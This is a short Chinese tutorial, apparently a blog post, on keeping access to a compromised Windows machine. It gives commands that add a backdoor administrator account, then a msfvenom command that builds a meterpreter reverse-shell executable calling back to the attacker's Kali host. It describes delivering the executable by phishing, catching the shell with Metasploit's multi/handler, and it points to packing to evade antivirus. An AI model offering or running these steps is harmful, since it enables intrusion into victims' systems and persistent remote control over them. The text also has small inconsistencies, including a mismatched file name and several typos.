获得目标机最终权限后
可以使用建立一个后门方便随后渗透
net user zhangsan 123456/add
net localgroup administrators zhangsan /add
但是很显然现在系统已经没有win7 因此已经不能利用了 因此可以尝试,以下东西获得想要权限
msfvenom-p windows/x64/meterpreter/reverse_tcp(系统/架构/作用/方式) lhost=kali地址 lport=监控端口 -f exe(要建立的文件格式) -o demo.exe
可以看到桌面上出现了lala.exe文件,这个可以通过钓鱼方式,给目标机。
现在已经在目标机中了那我们呢进入 kali中开始监听
打开msf,打开exploit
handler功能
use exploit/multi/handler
show options /查看配置
看到payload 和lhost(监听地址)lprot(监听端口)需要设置 直接用set方法就行了,注意这里要和前边一致信息
这时候就已经开启,等待目标机器点击就可以获得payload需要权限了获得metepreter后
随后就随你了。
加一条;如果想让木马能过杀毒软件可以,捆绑、加壳、其他就看看其他csdn大佬的绕过教程了,这里就不表述了